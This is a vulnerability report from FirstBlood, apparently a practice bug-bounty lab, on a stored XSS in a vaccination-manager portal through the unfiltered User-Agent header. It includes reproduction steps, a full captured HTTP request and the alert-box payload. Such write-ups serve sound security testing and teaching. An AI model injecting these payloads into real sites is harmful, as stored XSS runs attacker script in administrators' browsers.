FirstBlood-#917 — The User Agent parameter is vulnerable to XSS in the vaccination-manager portal.
This issue was discovered on FirstBlood v2
On 2021-10-30, vigilante Level 4 reported:
Summary:
The vaccination-manager portal is showing a number of fields, one of which is "User Agent".
I kept trying for XSS in the email address and in the end, noticed that the "User Agent" field doesn't do any filtering.
Steps to Reproduce:
- Navigate to /vaccination-manager/login.php and login to the portal.
(I reported how in a previous bug)
- Keep the portal open and upload a new proof of vaccination.
- Capture the request with Burp and modify the User Agent by adding an XSS payload to it <svg\/onload=alert
1
>.
POST /vaccination-manager/pub/submit-vaccination-proof.php HTTP/1.1
Host: 71db6da74f3c-vigilante.a.firstbloodhackers.com
Cookie: vaccination_manager=1169e091578618a592da0af78e85defa2760148f89bff98baf1aea6e22226668; doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=a1591376de74895e99a25819f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0<svg/onload=alert`1`>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13249935105080366202509426831
Content-Length: 16725
Origin: https://71db6da74f3c-vigilante.a.firstbloodhackers.com
Referer: https://71db6da74f3c-vigilante.a.firstbloodhackers.com/vaccination-manager/pub/upload-vaccination-proof.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------13249935105080366202509426831
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------13249935105080366202509426831
Content-Disposition: form-data; name="vaccination_proof"; filename="systembash.jpg"
Content-Type: image/jpeg
[...]
- Refresh the vaccine-manager portal, you will see an XSS pop up.
Impact
We are able to execute javascript in the victims' browser.
P2 High
Endpoint: /vaccination-manager/pub/submit-vaccination-proof.php
Parameter: User Agent
Payload: <svg\/onload=alert`1`>
FirstBlood ID: 29
Vulnerability Type: Stored XSS
When uploading a vaccine proof it is possible to achieve stored XSS against admins set via the user agent. As this value typically can't be user controlled the developers did not think it was 'worth' preventing against XSS.